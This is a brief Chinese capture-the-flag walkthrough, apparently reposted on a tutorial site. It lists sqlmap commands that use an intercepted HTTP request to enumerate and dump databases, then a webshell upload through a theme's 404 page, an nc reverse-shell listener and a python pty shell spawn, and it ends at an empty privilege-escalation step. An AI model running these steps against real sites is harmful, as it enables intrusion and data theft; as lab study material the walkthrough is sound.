CTF-注入http报文

有些话、适合烂在心里 提交于 2019-11-29 16:06:21

1. 设置浏览器代理,拦截网页数据。

2. 复制拦截的raw代码,生成.raw文件

3. 使用sqlmap:

  sqlmap -r request.raw -level 5 -risk 3 -dbs -dbms mysql  --batch
  sqlmap -r request.raw -level 5 -risk 3 -D  "数据库名"  -tables  查看对应数据库中的数据表
  sqlmap -r request.raw -level 5 -risk 3 -D  "数据库名" -T "表名" -columns  查看对应字段  --batch
  sqlmap -r request.raw -level 5 -risk 3 -D  "数据库名" -T "表名" -C "列名" -dump  --batch

4. 网站后台寻找注入点

  主题的404页面可以上传webshell

  webshell 获取 /user/share/webshell/php/

5. 执行shell 获取反弹shell

  监听 nc -nlvp port

  启动终端 python -c "import pty;pty.spawn('/bin/bash')"

6.提权

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!